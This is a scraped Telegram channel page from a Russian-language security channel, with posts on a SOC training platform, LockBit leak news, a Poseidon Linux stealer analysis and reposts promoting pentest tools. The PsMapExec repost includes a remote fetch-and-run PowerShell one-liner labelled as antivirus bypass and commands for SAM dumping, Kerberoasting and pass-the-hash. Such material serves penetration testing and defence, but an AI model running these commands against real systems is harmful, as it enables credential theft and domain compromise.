es
Feedback
Fsecurity | HH

Fsecurity | HH

Ir al canal en Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Mostrar más
2 010
Suscriptores
-124 horas
+27 días
-1230 días
Archivo de publicaciones
Моя первая попытка 👆

Сегодня попробовал такую площадку, как Defbox, спросите, что это? 🤔 Defbox — это платформа, которая помогает тестировать и совершенствовать практические навыки кибербезопасности. Менеджеры SOC Для разработки и тестирования правил корреляции аналитикам необходимо развернуть тестовую инфраструктуру. Defbox экономит время аналитиков - тестовая инфраструктура в Defbox развертывается и взламывается в один клик - нет необходимости развертывать и обслуживать испытательные стен. Профессоров Обучайте своих студентов реальным кибератакам на реальную инфраструктуру. Студенты получат прочные практические навыки, используя реальные инструменты для защиты живой систем Любым пользователям Посмотрите, как выглядит кибератака в режиме реального времени. Станьте киберзащитником, который защищает активы от киберугроз. Моя первая попытка стала проигрышной, но я успел посмотреть, какой пользователь был атакован!👾 Попробуй себя как защитник🛡 и почувствуй боль XD

Воздух Переговоры властей США и LockBit дальше смешного предложения в $50 тыс. не продвинулись и группировка всё-таки опубликовала украденные данные. Вот только открытом доступе оказались совсем не данные Центрального Банка Америки, а Evolve Bank & Trust — небольшого банка из Арканзаса. Хакеры разместили ссылки на внутренние документы скромной финансовой организации и на этом всё. В банке, кстати, подтвердили утечку, и заявили, что её локализовали и вообще всё уже ок. Зачем LockBit было так преувеличивать свои достижения — не ясно. ПО всей видимости, очень уж хотелось хоть как-то ответить на захват своей инфраструктуры силами ФБР США. НеКасперский

Repost from Kali Linux
💻 RedTiger — мультитул с массой функций для пентеста и взлома Позволяет проводить реализовывать разные атаки, типо SQL-инъек
💻 RedTiger — мультитул с массой функций для пентеста и взлома Позволяет проводить реализовывать разные атаки, типо SQL-инъекций, извлекать информацию по email и т.д. Исключительно в этичных целях 🖥 GitHub @linuxkalii

Repost from Pentest HaT
🔄 💻 PsMapExec v0.6.2 Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell. UPD. Начиная
🔄 💻 PsMapExec v0.6.2 Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell. UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac. PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF Текущая поддержка методов (протоколов): 🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL 🔵Kerberoast Реализованные модули: 🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов 🔵 ConsoleHistory - история в PowerShell 🔵 Files - файлы в типичных директориях 🔵 KerbDump - дамп Kerberos билетов 🔵 eKeys - дамп ключей (Mimikatz) 🔵 LogonPasswords - дамп logon passwords (Mimikatz) 🔵 LSA - дамп LSA (Mimikatz) 🔵 NTDS - реализация DCsync 🔵 SAM - дамп SAM Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
💻 Github ▪️ Documentation #soft #pentest #powershell #psmapexec #activedirectory #windows ✈️ // Pentest HaT 🎩

Обновил Obsidian-Pentest Коммит с изменениями -> [ссылка] Смотрите на дату если не хотите смотреть коммит Приятного чтения 👾📖

Repost from Kali Linux
💻 Poseidon — стилер от APT-C-56 Хакерская группировка APT-C-56, также известная как Transparent Tribe, ProjectM и C-Major, в
💻 Poseidon — стилер от APT-C-56 Хакерская группировка APT-C-56, также известная как Transparent Tribe, ProjectM и C-Major, вновь активизировала свою деятельность, на этот раз с использованием атак на Linux-системы. Базирующаяся в Южной Азии группа киберпреступников обычно сосредотачивает свои усилия на странах данного региона, в том числе часто атакуя Индию. APT-C-56 известна своими сложными методами фишинговых атак и мультиплатформенными вредоносными программами, включая знаменитый троян CrimsonRAT для Windows. Недавно специалисты из 360 Advanced Threat Research Institute зафиксировали атаку, в ходе которой APT-C-56 использовала файлы Linux c расширением .desktop для распространения вредоносного ПО. Вредоносная программа, получившая название Poseidon, является инфостилером и предназначена для кражи данных. Метод атаки с Linux-ярлыками ранее применялся довольно редко, что делает его особенно опасным. Для осуществления атаки группа создала архивный файл, содержащий desktop-файл, который в Linux-системах выполняет роль ярлыка. Пользователь, запускающий этот файл, активирует цепочку событий: загружается и открывается поддельный документ, одновременно скачиваются и запускаются вредоносные ELF-файлы. Затем Poseidon, написанный на Go, устанавливает постоянное присутствие в системе для сбора конфиденциальной информации. Архивный файл, рассмотренный исследователями, имел название Agenda_of_Meeting.zip и содержал desktop-файл approved_copy.desktop. Этот файл использует символы # для увеличения размера и обхода антивирусных систем. После удаления этих символов становится виден скрипт, который скачивает и открывает PDF-документ, а затем создаёт скрытые директории и запускает вредоносные программы. Одна из программ выполняет функции сбора данных и отправки их на сервер злоумышленников. Исследование показало, что Poseidon способен выполнять множество задач: фиксировать нажатия клавиш, загружать и скачивать файлы, сканировать порты, делать скриншоты, исполнять команды и осуществлять удалённое управление. Эти функции делают его мощным инструментом для шпионажа. 🗄 Подробнее @linuxkalii

Repost from Pentest HaT
🔄😉 BloodHound CE v5.11.0 Инструмент для выявления связей и построения графов в active directory. Достаточно одной учетной з
🔄😉 BloodHound CE v5.11.0 Инструмент для выявления связей и построения графов в active directory. Достаточно одной учетной записи доменного пользователя. Необходимая вещь при пентесте 🏠 Windows среды. Для сбора информации используется скрипт bloodhound.py или SharpHound Установка: curl -L https://ghst.ly/getbhce | docker compose -f - up http://localhost:8080/ui/login Логин admin и сгенерированный пароль Сбор информации: python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp В 💻 Kali устанавливается одной командой: sudo apt install bloodhound.py 💻 Download 🔠 Docs #bloodhound #pentest #active_directory #soft ✈️ // Pentest HaT 🎩

Доброе утро Начинаем с мема 👾

Repost from Blue (h/c)at Café
#meme
#meme

Ты тот самый Вовка ? 🤔
Anonymous voting

Repost from #memekatz
Когда нашел чужой шелл во время пентеста... #meme #shell

Fsecurity | HH - Estadísticas y analítica del canal de Telegram @hellohackingteam